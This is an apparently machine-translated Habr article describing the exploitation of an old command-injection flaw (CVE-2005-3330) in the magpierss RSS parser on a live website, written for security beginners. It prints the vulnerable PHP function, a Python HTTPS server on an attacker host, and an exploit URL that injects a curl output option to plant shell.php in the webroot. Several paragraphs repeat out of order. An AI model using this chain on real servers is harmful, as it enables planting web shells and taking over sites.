Example of exploiting one old vulnerability
All good! I would like to talk about the exploitation of an old known vulnerability CVE-2005-3330 , which we discovered in 2016 on a fairly popular website that has been going on since 2006. I can only assume that the framework with the vulnerability simply forgot to remove from the site, although what the hell is not joking can be used.
The article may be useful for beginners who learn information security.
So. The vulnerability is present in the RSS parser magpierss-0.72 , which in turn uses the Snoopy library. An example of an exploit here . But it, as happens quite often, only hints at how vulnerability can be exploited. The description of the vulnerability tells us that the vulnerability manifests itself in the transmission of user data, namely the https addresses of a third-party website in the GET parameter url .
')
In order to exploit the vulnerability:
Now you can exploit. In our case, the query looked like this:
What does the implementation of the http-request to the vulnerable site <host: port> with the url parameter, into which we send the page address on the attacker's site https: // <hacker_host: hacker_port> /index.php . It has been established experimentally that the site will put the contents of the index.php file in the shell.php file of the site root. Now the site of the victim <host: port> contains our shell.php script. You can refer to it as follows:
The recommendation for the correction is to remove unused code and obsolete frameworks, check the site for the presence of backdoors, shellcodes, etc.
The site administration confirmed the vulnerability and began the repair process; allowed to publish an article with impersonal information.
The article may be useful for beginners who learn information security.
So. The vulnerability is present in the RSS parser magpierss-0.72 , which in turn uses the Snoopy library. An example of an exploit here . But it, as happens quite often, only hints at how vulnerability can be exploited. The description of the vulnerability tells us that the vulnerability manifests itself in the transmission of user data, namely the https addresses of a third-party website in the GET parameter url .
')
Vulnerable function
function _httpsrequest($url,$URI,$http_method,$content_type="",$body="") { if($this->passcookies && $this->_redirectaddr) $this->setcookies(); $headers = array(); $URI_PARTS = parse_url($URI); if(empty($url)) $url = "/"; // GET ... header not needed for curl //$headers[] = $http_method." ".$url." ".$this->_httpversion; if(!empty($this->agent)) $headers[] = "User-Agent: ".$this->agent; if(!empty($this->host)) $headers[] = "Host: ".$this->host; if(!empty($this->accept)) $headers[] = "Accept: ".$this->accept; if(!empty($this->referer)) $headers[] = "Referer: ".$this->referer; if(!empty($this->cookies)) { if(!is_array($this->cookies)) $this->cookies = (array)$this->cookies; reset($this->cookies); if ( count($this->cookies) > 0 ) { $cookie_str = 'Cookie: '; foreach ( $this->cookies as $cookieKey => $cookieVal ) { $cookie_str .= $cookieKey."=".urlencode($cookieVal)."; "; } $headers[] = substr($cookie_str,0,-2); } } if(!empty($this->rawheaders)) { if(!is_array($this->rawheaders)) $this->rawheaders = (array)$this->rawheaders; while(list($headerKey,$headerVal) = each($this->rawheaders)) $headers[] = $headerKey.": ".$headerVal; } if(!empty($content_type)) { if ($content_type == "multipart/form-data") $headers[] = "Content-type: $content_type; boundary=".$this->_mime_boundary; else $headers[] = "Content-type: $content_type"; } if(!empty($body)) $headers[] = "Content-length: ".strlen($body); if(!empty($this->user) || !empty($this->pass)) $headers[] = "Authorization: BASIC ".base64_encode($this->user.":".$this->pass); for($curr_header = 0; $curr_header < count($headers); $curr_header++) { $cmdline_params .= " -H \"".$headers[$curr_header]."\""; } if(!empty($body)) $cmdline_params .= " -d \"$body\""; if($this->read_timeout > 0) $cmdline_params .= " -m ".$this->read_timeout; $headerfile = uniqid(time()); # accept self-signed certs $cmdline_params .= " -k"; exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return); In order to exploit the vulnerability:
- We must have a website that will give you a page via https. We can build such a website on Python in 5 seconds. Create a https.py script:
import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('hacker_host', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever()
To work, he will need a certificate. Create a self-signed certificate with the following command:openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
At the root of the https.py script , we put the index.php script with any interesting content, like this:<?php echo("hello world!"); ?> - We need to know the path to pass to the url parameter what we want:
http://<host:port>/<path>/usr/lib/magpierss-0.72/scripts/magpie_debug.php?url=
Now you can exploit. In our case, the query looked like this:
http://<host:port>/<path>/usr/lib/magpierss-0.72/scripts/magpie_debug.php?url=https://<hacker_host>/index.php -o"cache/../../../../../shell.php" What does the implementation of the http-request to the vulnerable site <host: port> with the url parameter, into which we send the page address on the attacker's site https: // <hacker_host: hacker_port> /index.php . It has been established experimentally that the site will put the contents of the index.php file in the shell.php file of the site root. Now the site of the victim <host: port> contains our shell.php script. You can refer to it as follows:
http://<host:port>/shell.php The recommendation for the correction is to remove unused code and obsolete frameworks, check the site for the presence of backdoors, shellcodes, etc.
The site administration confirmed the vulnerability and began the repair process; allowed to publish an article with impersonal information.
Source: https://habr.com/ru/post/309064/
All Articles